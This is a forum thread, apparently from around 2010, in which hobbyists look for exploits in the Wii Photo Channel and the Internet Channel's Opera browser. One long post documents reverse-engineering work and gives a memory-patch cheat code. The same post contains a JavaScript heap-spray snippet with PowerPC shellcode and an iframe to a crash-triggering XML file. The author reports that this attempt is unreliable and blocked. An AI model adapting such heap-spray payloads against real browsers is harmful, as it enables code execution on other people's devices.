Idea for new Wii exploits?

Hello! :)
I was reading something about the Photo Channel on Wikipedia, and it says that it can read the following formats:
JPEG, JPG, MOV, AVI, MP3, AAC, M4A
And it also mentions that the current version v1.1 was last updated on December 10, 2007...
So, in theory, all the vulnerabilities discovered for those file formats since then should still be unfixed! :O
Here's just a few examples: :P
* WAV
* MJPEG
* M4A
* AAC
I know that all these exploits are platform/implementation dependent... :/
But who knows, maybe the programmers at Nintendo made similar mistakes! :)
Has anyone tried testing something like this yet? ^_^

The ease of finding exploits depends on whether or not Nintendo were lazy and used open libraries, or wrote proprietary ones. If the later, its much harder to find exploits AFAIK.

Also, I believe in v1.1, they removed the music playing, so no MP3, AAC or M4A (I thought AAC and M4A were the same anyway? Maybe I got confused...)

Quote
SifJar
(...) I thought AAC and M4A were the same anyway? Maybe I got confused... (...)

You're right! They're just different file extensions for the same file format! :P

Anyway, I wonder if the Bannerbomb exploit was based on a Heap Overflow similar to this one! ;)

Quote
SifJar
Also, I believe in v1.1, they removed the music playing, so no MP3, AAC or M4A

Btw, Photo Channel v1.1 still supports AAC/M4A files, like mentioned here! ;)

Yeah I don't think you can just 'make' an exploit just because it loads files from an SD card.

Bannerbomb is most likely based on a stack overflow, which are the easiest to exploit.

If you can get the photo channel to crash with intentionally corrupted files, then you might be on to something. But I don't think you will. The 'normal' file formats are well known and there are good libraries available for them, which are exploit free.



Edited 1 time(s). Last edit at 12/08/2010 12:02PM by Daid.

I know I should probably do some more of my own research before asking, but what the heck. Has anyone tried any web-based exploits on the wii?

[php.bigresource.com]
"Execute Exe File From Php Code Through Browser"

Maybe host a .dol file on a webserver somewhere?

I'm going to start picking apart opera and seeing if any exploits might apply to the Wii. Feedback(especially "it's already been tried") is greatly appreciated

Quote
otto
[php.bigresource.com]
"Execute Exe File From Php Code Through Browser"

Maybe host a .dol file on a webserver somewhere?

That php exec func is _only_ for executing software on the web server, not the client.

Maybe if someone would release the source to Smash Stack, or it's JAP clone, maybe that would help us PAL Wii owners.

Its being ported to PAL (by several different people/groups of people I think), be patient ;)

Fine fine. I'll stop hijacking this thread. Nut how can it be being ported without the source? Is Comex's USA version or Y.S's JAP version open source?

It's probably being cloned. Although I'd also say ported because the same stack overflow is being used.

Quote
yellowstar

Quote
otto
[php.bigresource.com]
"Execute Exe File From Php Code Through Browser"

Maybe host a .dol file on a webserver somewhere?

That php exec func is _only_ for executing software on the web server, not the client.

I see. I know that Opera has some decent exploits. Most of the stuff I have read is mainly for Opera 11. I've done some more reading on Opera 9 for wii and it doesn't even look like it supports php scripts anyway

[www.opera.com]

But it does have XML support

[securitytracker.com] -this one is to exploit a .dll file, but I'm still looking around at some other sites as well.
I know that packetstorm has some opera exploits in their database...

[packetstormsecurity.org]

If I am able to compromise the wii through opera and the internet channel, would I have access to the wii's nand?

Also back to the original subject and PhotoChannel. Has anyone come up with a steganography program that can launch embedded code?

Quote
metroid_maniac
Fine fine. I'll stop hijacking this thread. Nut how can it be being ported without the source? Is Comex's USA version or Y.S's JAP version open source?

Same way the JAP version was done without source: reverse engineering.

Quote
otto

Quote
yellowstar

Quote
otto
[php.bigresource.com]
"Execute Exe File From Php Code Through Browser"

Maybe host a .dol file on a webserver somewhere?

That php exec func is _only_ for executing software on the web server, not the client.

I see. I know that Opera has some decent exploits. Most of the stuff I have read is mainly for Opera 11. I've done some more reading on Opera 9 for wii and it doesn't even look like it supports php scripts anyway

[www.opera.com]

But it does have XML support

[securitytracker.com] -this one is to exploit a .dll file, but I'm still looking around at some other sites as well.
I know that packetstorm has some opera exploits in their database...

[packetstormsecurity.org]

If I am able to compromise the wii through opera and the internet channel, would I have access to the wii's nand?

Also back to the original subject and PhotoChannel. Has anyone come up with a steganography program that can launch embedded code?

Of course opera "supports" php, anything that can use HTTP "supports" it, php is server-side only, the client doesn't need anything really to "support" it.

Hey otto! :)
That's a pretty good idea! :D
Here's some info that might help! ;)

According to the description of the Internet Channel, the Wii is running Opera v9.30, so any vulnerabilities found for that version and above should probably work! ;)
Also, it supports Flash too! So, another source of exploits to try! ;)

At the official Opera website, they maintain an updated list of every security vulnerability found in the browser! :D
Not very technically detailed, though! :P

The Exploit Database website also has a pretty good list of Opera exploits for you to try! ;)

Also, here's some random interesting recent exploits: ;)
* Opera 11 Integer Truncation Vulnerability
* Opera Buffer Overflow and Information Disclosure
* Opera 10.01 Remote Array Overrun (Arbitrary code execution)

Good luck!!! :D
And keep us updated of your progress! ;)

hey,

i've spend some days playing around with the internet channel. i found this thread and i think it's appropriate to share my experience here :) the bad news first: i didn't found any really useful exploit. if you aren't interested in technical details you can stop reading here. also note, that i'm not a native speaker, so excuse my bad wording :)

basically, there're several points to attack:
(1) basic html/xml/javascript parser vulnerabilities
(2) jpg/png/etc. attacks
(3) flash

---

but before starting with concrete attacks, you do usually some kind of static analysis. for this, you need of course the main executable of the internet channel.
"easy", i thought, looking up the wiibrew title database, starting wiifuse_server und copy the file over. as usual, there're several files (27.app - 2f.app, at least for the latest version 4.3) and you've to identify the executeable. my method is, to look out for a string "Metrowerks Target Resident Kernel for PowerPC"; if the file contain that string, it is an executable generated with the nintendo sdk (at least, this is my theory).

so, if you get a DOL you do that for example:

$ strings -t x batman.dol | grep 'Metrowerks Target'
    287  Metrowerks Target Resident Kernel for PowerPC

however, this wasn't the case for any file of the internet channel.
after some search, i found this:

$ xxd 00000028.app | grep 'arget Re' -A 3 -B 1
0000390: a638 1021 0010 33bf 4d65 7472 006f 7765  .8.!..3.Metr.owe
00003a0: 726b 7320 5400 6172 6765 7420 5265 0073  rks T.arget Re.s
00003b0: 6964 656e 7420 4b00 6572 6e65 6c20 666f  ident K.ernel fo
00003c0: 1372 2050 3022 5043 00b4 2c0a 601b 0c48  .r P0"PC..,.`..H
00003d0: 092f 3c0c 20d6 0181 a97c 5100 43a6 7c5a  ./<. ....|Q.C.|Z

which is... well, strange. look at the hexdump of the string; it contains several null bytes in it. i have no idea why this is so...
also, by trying to identify the dol header, you find some similarities with a valid one, but it's somehow fucked up. bleh, i gave up at this point.

another thing you want to have is some kind of debugging. first, (a) there is wiird. second, (b) there is a so called "fwrite patch", which enables debugging features over usb gecko and, for this particular case, it enables exception logs (see below for some examples).

for (a) you usually take gecko os, and boot your title and applying some patches (for example (b)). however, while (a) worked (setting breakpoints, view the memory content, etc.), (b) didn't. strange... so I looked a bit in the gecko os source and found nothing, except it do all things as excepted, but it just don't find a match for the fwrite function. well, bad.
so i compared the content of the executable loaded by gecko os, and the app files i have from the nand and it matched with 0000002f.app. although this is apparently a valid executable, it's pretty small. also, it contains no fwrite function. so my guess is, 2f.app is some kind of a loader. this is approved by the fact, that by looking at the memory dump of the running internet channel I found the fwrite function. gotcha!

so, i know there is a fwrite function, but i cannot patch it with gecko os, what should i do now? exactly: write a cheat code :)
since this is my first cheatcode i wrote, it isn't that generic. at least you can use it for the PAL version of the internet channel.

[fwrite patch for inetchannel]
* 040869E8 7C8429D6
* 040869EC 39400000
* 040869F0 9421FFF0
* 040869F4 93E1000C
* 040869F8 7F8A2000
* 040869FC 409C0064
* 04086A00 3D00CD00
* 04086A04 3D60CD00
* 04086A08 3D20CD00
* 04086A0C 61086814
* 04086A10 616B6824
* 04086A14 61296820
* 04086A18 398000D0
* 04086A1C 38C00019
* 04086A20 38E00000
* 04086A24 91880000
* 04086A28 7C0350AE
* 04086A2C 5400A016
* 04086A30 6400B000
* 04086A34 900B0000
* 04086A38 90C90000
* 04086A3C 80090000
* 04086A40 701F0001
* 04086A44 4082FFF8
* 04086A48 800B0000
* 04086A4C 90E80000
* 04086A50 540037FE
* 04086A54 7D4A0214
* 04086A58 7F8A2000
* 04086A5C 419CFFC8
* 04086A60 7CA32B78
* 04086A64 83E1000C
* 04086A68 38210010
* 04086A6C 4E800020

well, let's try to attack it:
(1.1) MangleMe. cool idea: this is a script which generates randomily a html output under several conditions. also, it inserts a refresh directive, forcing the browser to immediately reload the page. each request, generates a new page and so on. the goal is to crash the browser. if that happens, you can find an unique ID in the httpd log and you can regenerate the testcase.

i played a bit with it, but not that long because at this point i realized the wii browser supports flash (haha).

---

(2) i tried some PoC for jpg/png vulnerabilities. didn't worked out immediately, so i skipped that part basically.

---

(3) flash. great. i never wanted to touch that piece of software in my life, except for youtube :-)
but never say never, here we go: as you probably know, there're several flash versions out there. flash is running in a virtual maschine, which supports several instructions on a byte code level (similiar to java VM, etc.). we want to work on that level, so a grabbed the AVM2 Overview and took a disassembler (swfdump, but there're more for windows afaik).
also, you find many properly worked out reports of flash flaws, for example that one is just awesome: Leveraging the ActionScript VirtualMachine (probably a cylon like segher)

now it was time to get my hands dirty, so i tried some PoCs and real life examples to run on my wii... but there is a "but": the internet channel didn't accept any of them. so i tried to build some awes0me flash m0viez on my own.
- flex (the adobe flash compiler) is free, i downloaded the oldest version available on their site. i've create one example with it. it outputs flash9 compatible files. works on my PC but not on the wii
- haxe. produces flash8 compatbile swf files. works on my PC but not on the wii
- swfc. prodcues flash6 code, works on both PC and wii. success?

well, actually not. what's the version of the flash plugin in the wii? according to [www.adobe.com] it's "9,1,122,0". google doesn't know much about this version. wikipedia says, it's the flash player lite 3.1, which was released in FEB 2009, which is quite old! (the latest internet channel was released back in SEP 2009).

hrm, so why the flex and haxe stuff don't work? you know, AVM2 was introduced with flash9, so there shouldn't be a problem with the internet channel, right? but, as you can guess already, wrong :/ some guy who develops flash stuff (i don't have the URL anymore) stated he cannot use feature above flash7. there're some more hints if you google for it.

so.. damn. basically that means i cannot use new vulnerabilities found for flash (at least if they're based on AVM2, but the most are). the good thing here is, that swfc runs on linux and it's open source.
i tried some other stuff with it, for example including some malformed JPEGs in the swf file. this wasn't that easy, since swfc tries to verify the JPEG with libjpeg and transform it (for whatever reason) before embedded it in the swf file. so i wrote a litte patch for swfc (yay, open source) to avoid this. although i got that working, i had no success with malformed JPEGs. i gave up on that thing... (if someone interested in the swfc patch, feel free to contact me, but you're probably able to do it yourself anyway :)).

---

so this was my flash expierence. i wrote (1.1) before, because there's a (1.2), which was the best result on my internet channel journey ->
using this PoC results in a crash (as stated in the report). however, looking at the exception logs (enabled due to the fwrite thingy), you get this (for some reason, that needs 2-3 minutes to happen):
0003, 0005, 0008, 0009 and many many more. basically the wii goes wild now (which probably a bit risky, but heh).

well, 0009 is very interesting.

Attempted to fetch instruction from invalid address 0x91150bb8 (read from SRR0)

to make it short, you can control the data in that region. how? allocate stuff on the heap is quite easy in a browser, just allocate some data in the java script virtual maschine and do that several times (aka "heap spraying"). my code for that:

SCRIPT
	var i = 0x3377331; //force the VM to align the data, since there's code after it
	var str = "\u6000\u0000"; //nop
	//place many many NOPs here, since we don't know exactly where it jumps in here.
	for (i = 0; i < 20; i++) {
		str += str;
	}
	//enlighten the DVD-drive LED!
	str += "\u3d20\ucd80"; //lis 9,0xcd80
	str += "\u3900\u0020"; //li  8,0x20
	str += "\u9109\u00c0"; //stw 8,0xc0(9)
	str += "\u4e80\u0020"; //blr
	str += "\u6000"; //proper padding. again alignment stuff

	arr = new Array(100);
	for (i = 0; i < 100; i++) {
		arr = str;
	}
	alert(arr[4]);
/SCRIPT
BODY
	IFRAME src="evil_xml_exploit.xml"
/BODY
<!-- well, correct the html tags above on your own. somehow the forum software fuck them up :) -->

on x86 it's a bit easier than here, because a nop is just "0x90", i.e. just one byte, so you don't have to care about alignment in this case. fortunately, you can fool the java script VM by allocate a variable of the size u32. it's better for the VM to place that on an aligned address, in order to load/store it with one instruction. therefore, data after that is also (properly) aligned.

anyway, if the stuff works, the LED should go on.
well, BUT, two things, why it doesn't work/isn't good anyway:
- it doesn't work because, mem2 (the 0x9000000 region; check wiibrew for it) is configured as guarded memory (at least the internet channel does so), meaning that the CPU can't fetch instructions from that memory region. you would have to execute some instruction before to disable that (reconfigure BATs. thanks to segher for pointing this out to me). you can determine that by studying the content of SRR1 more closly.
- this attack isn't reliable. it does on average only every 5th time what i want (jumping into to the heap spray stuff). compare the exception logs. this wouldn't be good enough for a public exploit imho.

---

so, if you got that far, thanks for reading and hopefully it's useful for somebody out there.
for my part i've gave up the whole opera thing, primarily because i don't have the binary for static analysis. probably i would try more stuff if someone can figuring out what's wrong there. but anyway, keep in mind that nintendo could easily fix that kind of exploits, so consider if you really want to invest time on it.


cheers,
lewurm

Thanks for the technical writeup lewurm, it's nice to see such an in-depth post. It's true that even if a reliable exploit was found in the Internet Channel I'm sure Nintendo would just pull what they did with Sudoku on the DSi Shop.

But many people have the internet channel installed already, making it quite a nice attack vector. The issue I see with releasing an page based exploit is that people also could use it for bad things. Goto url X to brick your Wii.

I looked trough the list of opera exploits above, and only a few are remote code execution, and they all don't seem to crash the wii. I figured if I can find some way to crash the Wii I can take it from there. But they seem to depend on allocation of large amounts of memory, that the Wii doesn't have.

The opera 'engine' is pretty secure I would assume. Maybe it's more likely that you'll find an exploit in code custom for the Wii. Trough the bookmark system for example? The internet channel saved data seems to be protected from copying to SD, but does that also mean if you have a copy of it on your SD card (by means of Banana Saves for example) that you cannot copy it back? Else you might be able to build a custom internet channel save with a too long bookmarked URL that exploits the channel.

I must say that lewurm has put more time and effort into this than I would be able to in a month. First I guess I should say that I don't have much of a programmer/hacker background, I do know how to pick apart small pieces of code and sometimes if I'm lucky make them do what I want. I'm also a construction worker and I have a small child so I don't have a lot of time to devote to this either.

Daid you bring up a few good points. First, a malicious URL that would brick your wii would definitely be bad. Second, if I were able to exploit the internet channel to run code how do I run the code? It's kind of a catch 22. I would like to be able to softmod a wii by going to a specific url, but if I crash the internet channel how would I have access to the needed files? Would it be possible to edit the code for smash stack and maybe launch via "file://" link or something similar in internet channel?